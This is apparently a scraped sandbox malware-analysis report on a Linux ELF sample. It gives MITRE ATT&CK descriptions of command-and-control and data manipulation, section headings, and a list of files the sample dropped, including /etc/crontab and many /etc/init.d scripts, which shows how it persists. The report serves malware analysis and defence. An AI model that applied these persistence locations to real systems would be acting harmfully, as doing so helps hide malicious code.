Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report sBKWt6JPZa.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/.mod

/etc/.cfg

/etc/crontab

/etc/init.d/acpid

/etc/init.d/alsa-utils

/etc/init.d/anacron

/etc/init.d/apparmor

/etc/init.d/apport

/etc/init.d/avahi-daemon

/etc/init.d/binfmt-support

/etc/init.d/bluetooth

/etc/init.d/console-setup.sh

/etc/init.d/cron

/etc/init.d/cryptdisks

/etc/init.d/cryptdisks-early

/etc/init.d/cups

/etc/init.d/cups-browsed

/etc/init.d/dbus

/etc/init.d/dns-udp4

/etc/init.d/gdm3

/etc/init.d/hddtemp

/etc/init.d/hwclock.sh

/etc/init.d/irqbalance

/etc/init.d/iscsid

/etc/init.d/keyboard-setup.sh

/etc/init.d/kmod

/etc/init.d/lightdm

/etc/init.d/lm-sensors

/etc/init.d/lvm2-lvmpolld

/etc/init.d/mono-xsp4

/etc/init.d/multipath-tools

/etc/init.d/open-iscsi

/etc/init.d/open-vm-tools

Linux Analysis Report
sBKWt6JPZa.elf